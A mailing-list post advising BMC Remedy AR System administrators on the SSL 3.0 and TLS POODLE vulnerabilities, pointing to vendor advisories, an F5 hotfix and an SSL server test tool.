Here is an update on SSL 3.0 POODLE and TLS POODLE vulnerability. 1. SSL 3.0 “POODLE” Security Vulnerability -- CVE-2014-3566
Please refer to the BMC support site link http://www.bmc.com/support/support-news/SSL_3_0_POODLE_Security_Vulnerability_CVE_2014_3566.html for information about BMC product's update on the SSL 3.0 "POODLE" Security vulnerability. Information specifically relevant for for BMC Remedy AR System and ITSM Suite 7.6.04, 8.0, and 8.1 and 8.8 is as follows: A. See support article https://kb.bmc.com/infocenter/index?page=content&id=S:KA418664 for instructions for disabling SSL V3 in Tomcat used by Mid-Tier. B. If you are using the LDAP integration plug-in, BMC recommends consulting your LDAP Server documentation for turning off SSL V3 in your LDAP Server. An LDAP plug-in hotfix to allow the LDAP plug-in to use TLS for communication with LDAP Server will be available by January 31, 2015. 2. TLS POODLE issue with load balancers - There is a newly reported TLS POODLE vulnerability. Please refer to https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls - There is a new Critical Vulnerability reported for this issue on F5 load balancers in the MITRE vulnerability database. It appears that F5 load balancer is vulnerable to this TLS POODLE vulnerability. Please refer https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8730 - F5 has reacted immediately and posted a hot fix. Please refer https://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html - It is important to apply the F5 hot fix in case you are using a F5 load balancer. - In case you are using any other load balancer, check with your load balancer vendor if it suffers from the TLS POODLE vulnerability and if so get a hoxtfix from your load balancer vendor. Please refer to https://www.imperialviolet.org/2014/12/08/poodleagain.html which lists other load balancer vendors affected by this vulnerability. - Use the SSL Labs SSL Server Test tool https://www.ssllabs.com/ssltest/ to check your Server for SSL related vulnerabilities. Regards --- Abhijit Rajwade _______________________________________________________________________________ UNSUBSCRIBE or access ARSlist Archives at www.arslist.org "Where the Answers Are, and have been for 20 years"
